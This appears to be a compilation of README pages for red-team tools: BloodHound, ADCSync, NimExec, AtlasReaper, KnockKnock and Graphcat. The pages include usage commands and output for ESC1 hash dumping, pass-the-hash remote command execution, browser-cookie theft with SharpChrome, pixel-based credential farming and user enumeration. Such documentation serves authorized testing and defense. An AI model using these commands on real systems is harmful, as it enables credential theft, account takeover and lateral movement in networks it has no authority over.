BloodHound - Six Degrees Of Domain Admin

BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

BloodHound CE is created and maintained by the BloodHound Enterprise Team. The original BloodHound was created by @_wald0, @CptJesus, and @harmj0y.

The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.

1. Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
2. Run curl -L https://ghst.ly/getbhce | docker compose -f - up
3. Locate the randomly generated password in the terminal output of Docker Compose
4. In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs

NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.

• If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.

• If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.

# Verify if Docker Engine is Running
docker info

# Attempt to stop Neo4j Service if running (on Windows)
Stop-Service "Neo4j" -ErrorAction SilentlyContinue

• A successful installation of BloodHound CE would look like the below:

https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9

• BloodHound Slack
• Wiki
• Contributors
• Docker Compose Example
• BloodHound Docs
• Developer Quick Start Guide
• Contributing Guide

Please check out the Contact page in our wiki for details on how to reach out with questions and suggestions.

ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.

This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO   CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

1. Valid Domain Credentials
2. A user list from a bloodhound dump that will be passed in.
3. A template vulnerable to ESC1 (Found with Certipy find)

# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of th   e target machine  [required]
  --help               Show this message and exit.

TODO

• Support alternative authentication methods such as NTLM hashes and ccache files
• Automatically run "certipy find" to find and grab templates vulnerable to ESC1
• Add jitter and sleep options to avoid detection
• Add type validation for all variables

Acknowledgements

• puzzlepeaches: Telling me to hurry up and write this
• ly4k: For Certipy
• WazeHell: For the script to set up the vulnerable AD environment used for testing

NimExec - Fileless Command Execution For Lateral Movement In Nim

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.

Compilation

nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname

Usage

test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

                                                                                             _..._     
                                                                                          .-'_..._''.  
   _..._   .--. __  __   ___         __.....__                          __.....__       .' .'      '.\ 
 .'     '. |__||  |/  `.'   `.   .-''         '.                    .-''         '.    / .'            
.   .-.   ..--.|   .-.  .-.   ' /     .-''"'-.  `.                 /     .-''"'-.  `. . '              
|  '   '  ||  ||  |  |  |  |  |/     /________\   \ ____     _____/     /________\   \| |              
|  |   |  ||  ||  |  |  |  |  ||                  |`.   \  .'    /|                  || |              
|  |   |  ||  ||  |  |  |  |  |\    .---   ----------'  `.  `'    .' \    .-------------'. '              
|  |   |  ||  ||  |  |  |  |  | \    '-.____...---.    '.    .'    \    '-.____...---. \ '.          . 
|  |   |  ||__||__|  |__|  |__|  `.             .'     .'     `.    `.             .'   '. `._____.-'/ 
|  |   |  |                        `''-...... -'     .'  .'`.   `.    `''-...... -'       `-.______ /  
|  |   |  |                                        .'   /    `.   `.                               `   
'--'   '--'                                       '----'       '----'                                  

                                            @R0h1rr1m          


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained    services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
    -u | --username <Username>              Username for NTLM Authentication.*
    -h | --hash <NTLM Hash>                 NTLM password hash for NTLM Authentication.*
    -t | --target <Target>                  Lateral movement target.*
    -c | --command <Command>                Command to execute.*
    -d | --domain <Domain>                  Domain name for NTLM Authentication.
    -s | --service <Service Name>           Name of the service instead of a random one.
    --help                                  Show the help message.

References

• https://github.com/juliourena/SharpNoPSExec
• https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1
• https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf
• https://github.com/jborean93/pypsexec/tree/master
• https://www.x86matthew.com/view_post?id=create_svc_rpc

AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.

Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                   .@@@@
                                               @@@@@
                                            @@@@@   @@@@@@@
                                          @@@@@   @@@@@@@@@@@
                                         @@@@@  @@@@@@@@@@@@@@@
                                        @@@@,  @@@@        *@@@@
                                          @@@@ @@@  @@  @@@ .@@@
   _  _   _         ___                       @@@@@@@     @@@@@@
  /_\| |_| |__ _ __| _ \___ __ _ _ __  ___ _ _   @@   @@@@@@@@
 / _ \  _| / _` (_-<   / -_) _` | '_ \/ -_) '_|  @@   @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_|    @@@@@@@@   &@
                                |_|             @@@@@@@@@@  @@&
                                                @@@@@@@@@@@@@@@@@
                                               @@@@@@@@@@@@@@@@. @@
                                                     @werdhaihai

Usage

AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

.\AtlasReaper.exe [command] [subcommand] [options]

Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

Below is a list of available commands and subcommands:

Commands

Each command has sub commands for interacting with the specific product.

• confluence
• jira

Subcommands

Confluence

• confluence attach - Attach a file to a page.
• confluence download - Download an attachment.
• confluence embed - Embed a 1x1 pixel image to perform farming attacks.
• confluence link - Add a link to a page.
• confluence listattachments - List attachments.
• confluence listpages - List pages in Confluence.
• confluence listspaces - List spaces in Confluence.
• confluence search - Search Confluence.

Jira

• jira addcomment - Add a comment to an issue.
• jira attach - Attach a file to an issue.
• jira createissue - Create a new issue.
• jira download - Download attachment(s) from an issue.
• jira listattachments - List attachments on an issue.
• jira listissues - List issues in Jira.
• jira listprojects - List projects in Jira.
• jira listusers - List Atlassian users.
• jira searchissues - Search issues in Jira.

Common Commands

• help - Display more information on a specific command.

Examples

Here are a few examples of how to use AtlasReaper:

• Search for a keyword in Confluence with wildcard search:

  .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

• Attach a file to a page in Confluence:

  .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

• Create a new issue in Jira:

  .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

Authentication

Confluence and Jira can be configured to allow anonymous access. You can check this by supplying omitting the -c/--cookie from the commands.

In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

1. .\SharpChrome.exe cookies /showall

2. Look for any cookies scoped to the *.atlassian.net named cloud.session.token or tenant.session.token

Limitations

Please note the following limitations of AtlasReaper:

• The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
• AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
• For write operations, the username associated with the user session token (or "anonymous") will be listed.

Contributing

If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.

KnockKnock - Enumerate Valid Users Within Microsoft Teams And OneDrive With Clean Output

Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.

Usage

$ python3 .\KnockKnock.py -h

  _  __                 _    _  __                 _
 | |/ /_ __   ___   ___| | _| |/ /_ __   ___   ___| | __
 | ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
 | . \| | | | (_) | (__|   <| . \| | | | (_) | (__|   <
 |_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
   v0.9                             Author: @waffl3ss


usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]

options:
  -h, --help           show this help message and exit
  -teams               Run the Teams User Enumeration Module
  -onedrive            Run the One Drive Enumeration Module
  -l                      Write legacy skype users to a seperate file
  -i INPUTLIST         Input file with newline-seperated users to check
  -o OUTPUTFILE        Write output to file
  -d TARGETDOMAIN      Domain to target
  -t TEAMSTOKEN        Teams Token (file containing token or a string)
  -threads MAXTHREADS  Number of threads to use in the Teams User Enumeration (default = 10)
  -v                   Show verbose errors

Examples

./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l

Options

• You can select one or both modes, as long as the appropriate options are provided for the modules selected.
• Both modules will require the domain flag (-d) and the user input list (-i).
• The tool does not require an output file as an option, and if not supplied, it will print to screen only.
• The verbose mode will show A LOT of extra information, including users that are not valid.
• The Teams option requires a bearer token. The script automatically removes the beginning and end portions to use only whats required.

How to get your Bearer token

To get your bearer token, you will need a Cookie Manager plugin on your browser and login to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.

References

@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum

Graphcat - Generate Graphs And Charts Based On Password Cracking Result

Simple script to generate graphs and charts on hashcat (and john) potfile and ntds

Install

git clone https://github.com/Orange-Cyberdefense/graphcat
cd graphcat
pip install .

Helper

$ graphcat.py -h
usage: graphcat.py [-h] -potfile hashcat.potfile -hashfile hashfile.txt [-john] [-format FORMAT] [-export-charts] [-output-dir OUTPUT_DIR] [-debug]

Password Cracking Graph Reporting

options:
  -h, --help            show this help message and exit
  -potfile hashcat.potfile
Hashcat Potfile
  -hashfile hashfile.txt
                        File containing hashes (one per line)
  -john                 John potfile
  -format FORMAT        hashfile format (default 3): 1 for hash; 2 for username:hash; 3 for secretsdump (username:uid:lm:ntlm)
  -export-charts        Output also charts in png
  -output-dir OUTPUT_DIR
                        Output directory
  -debug                Turn DEB   UG output ON

Usage

Graphcat just need a potfile with -potfile (default is hashcat, but you can use -john to submit a john potfile) and a hashfile with -hashfile. The hashfile should be in a specific format from the 3 availables formats with -format flag. Default is Secretsdump.

The tool will generate a report with multiple password cracking charts. You can get charts in png with the -export-charts flag.

$ graphcat.py -hashfile entreprise.local.ntds -potfile hashcat.pot
[-] Parsing potfile
[-] 164 entries in potfile
[-] Parsing hashfile
[-] 1600 entries in hashfile
[-] Generating graphs...
[-] Generating report...
[-] Report available at graphcat_1672941324.pdf

Formats

1: Only Hash

aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee

2: Username + Hash

test1:aad3b435b51404eeaad3b435b51404ee
test2:aad3b435b51404eeaad3b435b51404ee
test3:aad3b435b51404eeaad3b435b51404ee

3: Secretsdump

waza.local\test1:4268:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test2:4269:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test3:4270:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::

If a hash occurs more than once in the hash file, it will be counted that many times.

Moreover, if you submit secretsdump with password history (-history in secretsdump command), it will analyze similarity in password history

Charts example